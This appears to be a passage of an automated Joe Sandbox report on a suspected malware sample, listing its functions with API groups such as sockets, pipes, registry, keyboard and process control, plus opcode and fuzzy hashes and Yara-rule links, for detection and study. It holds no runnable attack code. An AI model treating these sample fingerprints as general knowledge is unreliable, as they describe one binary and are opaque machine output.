                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4170576061-0
                                                                                                                    • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                                                    • Instruction ID: bff6cc6e793e68216abc91cee3e512123971dd6f99640a708b85786b8c150f4f
                                                                                                                    • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                                                    • Instruction Fuzzy Hash: 7441B232A0878282E7649F26E5482AD7361FB84BE8F484235DE5E937D5CF3DD849CB00
                                                                                                                    Function 00007FF65608A884 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 161812096-0
                                                                                                                    • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                                                                    • Instruction ID: 309d6206e7fb4386894a860d9926bed2e5436b29b2c3417f2b7f09b9c15c27d0
                                                                                                                    • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                                                                    • Instruction Fuzzy Hash: 82419D36A04F1585EB50CF22E9806AD37B1FB84B98F194036DE4EA3B64CF3AE459C700
                                                                                                                    Function 00007FF6560815C4 Relevance: 10.6, APIs: 7, Instructions: 90registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 395352322-0
                                                                                                                    • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                                                    • Instruction ID: db0cc75d9a1f6f4e01f5b597bba4fb6cabac14aa82d8de96cc0970bb350c9a52
                                                                                                                    • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                                                    • Instruction Fuzzy Hash: F3418332618B8695E721CF11E5547EA63B1FF89748F480135EA8D97A68CF3ED14DC740
                                                                                                                    Function 00007FF656054FCC Relevance: 10.6, APIs: 7, Instructions: 76memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: f21550a20849581d29996fe50c4ece6234e076094f6ba7ae14899650e1c4ede6
                                                                                                                    • Instruction ID: c7c284a1df51463b52ad60d5609f8f5adf329d213c3b21fc1ca28f82441e27d8
                                                                                                                    • Opcode Fuzzy Hash: f21550a20849581d29996fe50c4ece6234e076094f6ba7ae14899650e1c4ede6
                                                                                                                    • Instruction Fuzzy Hash: B8319E21B08B4685EB649F12E644169B3A0FB85FE4F4C8236DA5EA3790CE3EE449C344
                                                                                                                    Function 00007FF65605F9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                    • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                                                    • Instruction ID: f9feaaa03d3446d88dca101e46f79cfec837348fcb187d0b4d4b6eb1e1b11f0e
                                                                                                                    • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                                                    • Instruction Fuzzy Hash: 17219172A18B4682EB108B25D11437963A0FB95B78F584331DA6E977D8DF7ED408CB02
                                                                                                                    Function 00007FF65605FAFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                    • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                                                    • Instruction ID: baeb9ed42490458e16dc79bfce6699722a5874d447c60cd110f0480a28a10922
                                                                                                                    • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                                                    • Instruction Fuzzy Hash: C731AC32A18A0682FB109B25D52837933A4EBA5B78F180330DA7D977D4CF3ED049CB01
                                                                                                                    Function 00007FF655FE8F40 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3220332590-0
                                                                                                                    • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                                                                    • Instruction ID: fc51c9702f43ee27cb9fad9a7aec4e8ed27f0583809238bc587d02e788a7b28b
                                                                                                                    • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                                                                    • Instruction Fuzzy Hash: EAA1056AA1424386EB648F31C9487BD33A1FF04B5CF181035EE19E7A94EE3D9C45D720
                                                                                                                    Function 00007FF65600A054 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: f$p
                                                                                                                    • API String ID: 3215553584-1290815066
                                                                                                                    • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                                                    • Instruction ID: 3852327a3f6ba694d60853ce569ab3269a97db52edd13f4038a91710fe1fd437
                                                                                                                    • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                                                                    • Instruction Fuzzy Hash: F012B522E0E26385FB209E19E24467A7761EB44774FDC4231E699976C6DF3FE948CB00
                                                                                                                    Function 00007FF65605D1F0 Relevance: 9.1, APIs: 6, Instructions: 131filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewcscat$FullNamePath$AttributesMoveOperationlstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 564229958-0
                                                                                                                    • Opcode ID: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                                                    • Instruction ID: 203c924045fda4ada1a88772ce40e8e5ea939d4da4928414410e7fa15dcdbc11
                                                                                                                    • Opcode Fuzzy Hash: 35062434fee54acf94d2c2a036a69dc928caf6f380b06f8f0a879a9cbd16691f
                                                                                                                    • Instruction Fuzzy Hash: 0B516622A1478295EB60EF60D5402ED6365FFA0B88F880033E64DB7999DFA9D74DC740
                                                                                                                    Function 00007FF655FED4CC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 0-2263619337
                                                                                                                    • Opcode ID: 3df143d41b72c37e8d3401a32f1c040a903f4fba463ccff2488bc58be4e83188
                                                                                                                    • Instruction ID: 6aea28e02479107d3dee79daf24d38ac8f3aa502f511020b191763b3d32d49dc
                                                                                                                    • Opcode Fuzzy Hash: 3df143d41b72c37e8d3401a32f1c040a903f4fba463ccff2488bc58be4e83188
                                                                                                                    • Instruction Fuzzy Hash: A251E736F09A0285EF50DF69E6441BC3365EB44F98F588535CA0EE7B99DE3AD80AC340
                                                                                                                    Function 00007FF655FE1E04 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2592858361-0
                                                                                                                    • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                                                    • Instruction ID: bcccacaf3017ab3fb5501f5bf5def38a43c181a20be7c20f253c7ab1032a4c2f
                                                                                                                    • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                                                                    • Instruction Fuzzy Hash: 0751BF36A0869386E720CB22E54877D3760FB85F98F584235DA5D97B94DF7EE809CB00
                                                                                                                    Function 00007FF656011E74 Relevance: 9.1, APIs: 6, Instructions: 56threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2082702847-0
                                                                                                                    • Opcode ID: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                                                                    • Instruction ID: a9fdae1edafbe7c37c5b5aaac167fee2fbcad148cd262d2237afbe7a21a780c7
                                                                                                                    • Opcode Fuzzy Hash: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                                                                    • Instruction Fuzzy Hash: 9C218121A0974281EE199BA1AA102796291AF4477CF5C0734DA3DA77D5DF3EE50CC200
                                                                                                                    Function 00007FF656052240 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1035833867-0
                                                                                                                    • Opcode ID: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                                                                    • Instruction ID: eba25507b36ee34dddeaa4c2590f9e6d6269c0c1d860c467d7698c966be1ba9c
                                                                                                                    • Opcode Fuzzy Hash: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                                                                    • Instruction Fuzzy Hash: 7811A335B1470186EB18CF62E61402967A6FF48BC1F098439CE0E97B94CE3ED809C700
                                                                                                                    Function 00007FF656002D5C Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4278518827-0
                                                                                                                    • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                                                    • Instruction ID: 9b373567ec85d718744dc4a4d7f337716d094db339a514d96292c943c811d822
                                                                                                                    • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                                                    • Instruction Fuzzy Hash: 461112729066408AD759CF3ADC481293BB2FB58B09B589034C2499F3B5EF39D49EC741
                                                                                                                    Function 00007FF65605DA1C Relevance: 9.0, APIs: 6, Instructions: 34windowtimethreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 839392675-0
                                                                                                                    • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                                                    • Instruction ID: 5e2277aed8766e0562007500096e7d838fb2189ff3c88b639cff80a757721b3a
                                                                                                                    • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                                                    • Instruction Fuzzy Hash: C6018F72A1574183EB119B22F914A29B362FF89B99F489134CA4A57B64DF3DD14CCB00
                                                                                                                    Function 00007FF65604F378 Relevance: 9.0, APIs: 6, Instructions: 33threadwindowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                                                    • Instruction ID: 1008b00901159a4722cc3fa8439d8e546e09c2138341bea6e8a76eb1bca46799
                                                                                                                    • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                                                    • Instruction Fuzzy Hash: F6F0A461F1875143F7614B72E9497296292BF88749F8C4434D94EA3B50DE7ED84CC600
                                                                                                                    Function 00007FF65604D868 Relevance: 9.0, APIs: 6, Instructions: 22memorysynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 146765662-0
                                                                                                                    • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                                                    • Instruction ID: 11d06024b100c56c404fea698f1e174d7e965a485a5bdf8928e539fb3627e6ab
                                                                                                                    • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                                                    • Instruction Fuzzy Hash: A0F0C025A14A01C2EB05DF77E9550296362FF89FA9B089131CD1E973B4DE3DD89DC300
                                                                                                                    Function 00007FF65607CDF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF65607BF47), ref: 00007FF65607CE29
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
